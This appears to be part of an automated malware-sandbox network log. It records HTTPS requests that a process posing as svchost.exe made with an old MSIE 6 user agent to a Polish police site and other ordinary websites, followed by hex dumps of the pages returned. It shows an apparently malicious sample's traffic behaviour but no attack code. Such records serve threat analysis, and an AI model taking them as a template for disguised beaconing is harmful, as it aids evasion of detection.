                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2734INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2750INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                                        Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2766INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                                        Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        14192.168.2.36352191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2775OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:53:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2776INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2792INData Raw: 4e 41 52 49 55 4d 20 43 45 44 55 52 20 50 54 2e 20 e2 80 9e 43 59 42 45 52 42 45 5a 50 49 45 43 5a 45 c5 83 53 54 57 4f 20 57 2e 2e 2e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 33 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 74 61 2d 62 6f 74 74 6f 6d 20 68 69 64 65 22 3e 0d 0a 20 0d 0a 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 31 39 2e 30 31 2e 32 30 32 33
                                                                                                                                                                                                                                                                                        Data Ascii: NARIUM CEDUR PT. CYBERBEZPIECZESTWO W...</a> </h3> </div> <div class="meta-bottom hide"> 2000 <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 19.01.2023
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2808INData Raw: 31 32 36 31 38 22 20 61 6c 74 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 0d 0a 31 30 30 30 0d 0a 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31
                                                                                                                                                                                                                                                                                        Data Ascii: 12618" alt="Guchoniemi" /></a></div><div class="item" style="width:300px; height:179px;margin-bottom:10px"><a href="/w20/batony/4596,1000Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=16571


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        15192.168.2.36436394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2823OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2823INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2824INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        16192.168.2.36375849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2824OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 2599149
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2829INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2845INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                                        Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2861INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2877INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2893INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2926INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                                        Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2942INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2958INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                        Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2974INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2990INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
